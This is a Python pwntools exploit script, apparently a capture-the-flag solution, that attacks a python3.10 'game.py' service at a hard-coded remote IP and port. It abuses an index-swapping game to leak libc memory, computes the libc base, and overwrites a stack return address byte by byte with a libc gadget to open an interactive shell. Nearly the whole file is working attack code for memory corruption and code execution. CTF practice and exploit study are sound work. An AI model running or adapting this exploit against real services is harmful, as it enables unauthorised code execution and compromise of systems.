#!/usr/bin/env python
# -*- coding: utf-8 -*-
# this exploit was generated via
# 1) pwntools
# 2) ctfmate
import os
import time
import pwn
# Paths to the target interpreter, the libc it links against and the loader.
# All three are local artefacts next to this script (the binary itself is a
# python3.10 build, see the argument list passed to start() below).
BINARY = "./python3.10"
LIBC = "./libc.so.6"
LD = "/lib64/ld-linux-x86-64.so.2"
# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF(BINARY)
libc = pwn.ELF(LIBC)
ld = pwn.ELF(LD)
# Terminal used by pwntools when it opens a gdb window (tmux side pane).
pwn.context.terminal = ["tmux", "splitw", "-h"]
# Core files from crashing local runs are discarded rather than kept/renamed.
pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
# Short aliases for the pwntools packing/unpacking helpers used below.
p64 = pwn.p64
u64 = pwn.u64
p32 = pwn.p32
u32 = pwn.u32
p16 = pwn.p16
u16 = pwn.u16
p8 = pwn.p8
u8 = pwn.u8
# Remote endpoint; both values can be overridden with the pwntools
# command-line args HOST=... and PORT=... (the commented lines are the
# local-testing defaults).
host = pwn.args.HOST or "52.59.124.14"
# host = pwn.args.HOST or "localhost"
port = int(pwn.args.PORT or 10013)
# port = int(pwn.args.PORT or 9090)
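def local(argv=None, *a, **kw):
    """Execute the target binary locally.

    Args:
        argv: extra command-line arguments appended after the binary path.
            ``None`` (the default) means no extra arguments. A mutable
            ``[]`` default was replaced by ``None`` so no list object is
            shared between calls; any iterable of strings is accepted.
        *a, **kw: forwarded unchanged to ``pwn.process`` or
            ``pwn.gdb.debug``.

    Returns:
        The pwntools tube for the spawned process. When the ``GDB``
        pwntools arg is set the process is started under gdb with the
        module-level ``gdbscript``; otherwise it is started plainly.
    """
    # Build a fresh list so the caller's sequence is never aliased.
    cmd = [exe.path] + list(argv or [])
    if pwn.args.GDB:
        return pwn.gdb.debug(cmd, gdbscript=gdbscript, *a, **kw)
    return pwn.process(cmd, *a, **kw)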
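def remote(argv=None, *a, **kw):
    """Connect to the process on the remote host.

    Args:
        argv, *a, **kw: accepted only for signature parity with ``local``;
            they are not used because the remote service is already
            running. The default is ``None`` instead of a shared ``[]``.

    Returns:
        The connected pwntools tube to ``host``:``port``. When the ``GDB``
        pwntools arg is set, gdb is attached to the tube with the
        module-level ``gdbscript`` before returning.
    """
    io = pwn.connect(host, port)
    if pwn.args.GDB:
        pwn.gdb.attach(io, gdbscript=gdbscript)
    return io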
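def start(argv=None, *a, **kw):
    """Start the exploit against the target.

    Dispatches to ``local`` when the ``LOCAL`` pwntools arg is set and to
    ``remote`` otherwise, passing ``argv``, ``*a`` and ``**kw`` through.

    Args:
        argv: extra arguments for the local process; ``None`` (the default,
            replacing a shared mutable ``[]``) is normalised to an empty
            list before dispatch so either backend receives a list.

    Returns:
        Whatever the chosen backend returns (a pwntools tube).
    """
    # Normalise here so a backend that concatenates lists still works.
    argv = [] if argv is None else argv
    if pwn.args.LOCAL:
        return local(argv, *a, **kw)
    return remote(argv, *a, **kw)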
# gdb commands used by local()/remote() when a GDB session is requested.
# Defined after those functions on purpose: the name is only looked up at
# call time. The string has no format placeholders, so it is assembled
# directly (leading and trailing newline preserved).
gdbscript = "\n".join(("", "set follow-fork-mode parent", "continue", ""))
def leak(io, index):
    """Read the 8 bytes at ``index`` .. ``index + 7`` and unpack them with ``u64``.

    One "hard" round is started, then for each of the eight positions the
    pair (0, position) is sent and the first integer printed after
    ``After: `` on the reply line is taken as that position's byte value.

    Args:
        io: pwntools tube connected to the target.
        index: first position to read.

    Returns:
        The eight collected byte values unpacked via the module-level
        ``u64``. Raises ValueError if a reported value is not a byte.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    collected = bytearray()
    for position in range(index, index + 8):
        io.sendlineafter(b"Index 1: ", b"%d" % 0)
        io.sendlineafter(b"Index 2: ", b"%d" % position)
        reply = io.recvline().strip()
        values = list(map(int, reply.split(b"After: ")[1].split()))
        collected.append(values[0])
    return u64(bytes(collected))
def swap(io, idx1, idx2):
    """Run one "hard" round sending the pairs (``idx1 + i``, ``idx2 + i``) for i in 0..7.

    Each index is sent as its decimal digits followed by a NUL byte and
    ``p64(5)``; the same template is used for both prompts.

    Args:
        io: pwntools tube connected to the target.
        idx1, idx2: base positions for the eight pairs.

    Returns:
        Always 0.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    # Hoisted: the template does not depend on the loop variable.
    template = b"%d\x00" + p64(5)
    for step in range(8):
        io.sendlineafter(b"Index 1: ", template % (idx1 + step))
        io.sendlineafter(b"Index 2: ", template % (idx2 + step))
    return 0
def write_byte(io, idx1, byte):
    """Run one "hard" round sending the same pair (``idx1``, ``byte``) eight times.

    Args:
        io: pwntools tube connected to the target.
        idx1: position sent at the ``Index 1`` prompt.
        byte: value sent at the ``Index 2`` prompt (decimal digits).

    Returns:
        Always 0.
    """
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    # Both messages are loop-invariant, so format them once.
    first = b"%d" % idx1
    second = b"%d" % byte
    for _ in range(8):
        io.sendlineafter(b"Index 1: ", first)
        io.sendlineafter(b"Index 2: ", second)
    return 0
def exp(off):
    """Run the full session against the target started via ``start``.

    Args:
        off: has no effect — it is overwritten by the hard-coded
            ``off = 0x50A43`` below. NOTE(review): either drop the
            parameter or remove the reassignment so the two agree.

    The session is a fixed sequence of prompt/response exchanges; the
    order of the calls below must not be rearranged.
    """
    io = start(["game.py"])
    # ===========================================================
    # EXPLOIT GOES HERE
    # ===========================================================
    # NOTE(review): total_ok / total_ns are only referenced by the
    # commented-out probing code that follows; they are unused on the
    # live path.
    total_ok = 0x108
    total_ns = 0x130
    # # swap(io, 0x198, 0xffffff)
    # io.sendlineafter(b"Easy or Hard? ", b"hard")
    # io.sendlineafter(b"Ready? ", b"")
    # io.recvline()
    # for i in range(1):
    # io.sendlineafter(b"Index 1: ", (b"%d") % (5))
    # io.sendlineafter(b"Index 2: ", (b"%d") % (total_ok))
    #
    # for i in range(1):
    # io.sendlineafter(b"Index 1: ", (b"%d") % (0))
    # io.sendlineafter(b"Index 2: ", (b"%d") % (total_ns+4))
    # for i in range(0x100, 0x200, 8):
    # print(hex(leak(io, i)))
    # Read 8 bytes at 0x8C8 with leak() and derive libc.address from them
    # using a hard-coded delta. NOTE(review): 0x29E40 presumably matches the
    # bundled ./libc.so.6; re-check it if that file changes.
    libc_leak = leak(io, 0x8C8)
    libc.address = libc_leak - 0x29E40
    pwn.info("libc: 0x%x\n" % libc.address)
    # Hard-coded libc offset; this assignment shadows the ``off`` parameter.
    # The commented alternatives are earlier candidates that were tried.
    off = 0x50A43 # 1
    # off = 0x80C55 # 1
    # off = 0x80C50 # 2
    # off = 0x80C50 # 4
    win = libc.address + off
    # win = 0x414141414141
    io.sendlineafter(b"Easy or Hard? ", b"hard")
    io.sendlineafter(b"Ready? ", b"")
    io.recvline()
    # indexes of return addresses on the stack.
    # Only ret_offs[1] is used by the loop below; the remaining entries are
    # unused candidates kept for reference.
    ret_offs = [
        0xFFFFFF, # for debugging
        0x2D8,
        0x828,
        0x658,
        0x7F8,
        0x2F8,
        0x708,
        0x6D8,
        0x608,
        0x5D8,
        0x598,
        0x4F8,
    ]
    # Send ``win`` one byte per pair at ret_offs[1] + i, lowest byte first
    # (byte i is ``(win >> (i * 8)) & 0xFF``).
    for i in range(8):
        io.sendlineafter(b"Index 1: ", (b"%d") % (ret_offs[1] + i))
        io.sendlineafter(b"Index 2: ", (b"%d") % ((win >> (i * 8)) & 0xFF))
    # print("offset: 0x%x" % off)
    # io.sendlineafter(b"Easy or Hard? ", b"asdf")
    # NOTE(review): io.close() is skipped if interactive() raises (e.g. the
    # peer drops the connection); a try/finally would guarantee the tube
    # is closed.
    io.interactive()
    io.close()
# Script entry point. exp() overwrites its ``off`` parameter with a
# hard-coded value, so the 0 passed here currently has no effect.
if __name__ == "__main__":
    exp(0)